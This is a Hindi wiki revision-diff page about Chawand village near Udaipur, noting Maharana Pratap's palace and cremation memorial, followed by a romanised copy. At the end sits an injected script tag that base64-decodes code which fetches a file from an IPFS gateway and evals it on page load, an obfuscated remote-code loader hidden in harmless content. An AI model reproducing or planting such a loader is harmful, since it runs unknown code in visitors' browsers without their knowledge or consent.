Difference between revisions of "चावंड उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "करीब" to "क़रीब")
Line 1: Line 1:
 
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
 
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
*चावंड नाम का पुराना गाँव उदयपुर से [[खैरवाड़े]] जाने वाली सड़क पर परसाद गाँव से करीब 6 मील पूर्व की तरफ है।  
+
*चावंड नाम का पुराना गाँव उदयपुर से [[खैरवाड़े]] जाने वाली सड़क पर परसाद गाँव से क़रीब 6 मील पूर्व की तरफ है।  
 
*यहाँ एक जैन-मंदिर है।
 
*यहाँ एक जैन-मंदिर है।
 
*[[महाराणा प्रताप]] के महल गाँव से आधे मील की दूरी पर,पहाड़ी पर बने हुए हैं और उसके नीचे देवी का एक मंदिर है।  
 
*[[महाराणा प्रताप]] के महल गाँव से आधे मील की दूरी पर,पहाड़ी पर बने हुए हैं और उसके नीचे देवी का एक मंदिर है।  

Revision as of 12:45, 25 August 2010

  • udayapur rajasthan ka ek khoobasoorat shahar hai aur udayapur paryatan ka sabase akarshak sthal mana jata hai.
  • chavand nam ka purana gaanv udayapur se khairava de jane vali s dak par parasad gaanv se qarib 6 mil poorv ki taraph hai.
  • yahaan ek jain-mandir hai.
  • maharana pratap ke mahal gaanv se adhe mil ki doori par,paha di par bane hue haian aur usake niche devi ka ek mandir hai.
  • maharana pratap ka svargavas inhian paha diyoan ki shreni ke bich hua tha.
  • inaka agni sanskar is sthan se dedh mil ki doori par bandoli gaanv ke pas bahane vale ek chhote se nale ke tat par kiya gaya tha.
  • smarak ke rup mean vahaan shvet-pashan ki ath stambhoanvali ek chhoti si chhatri bani hai.

sambandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>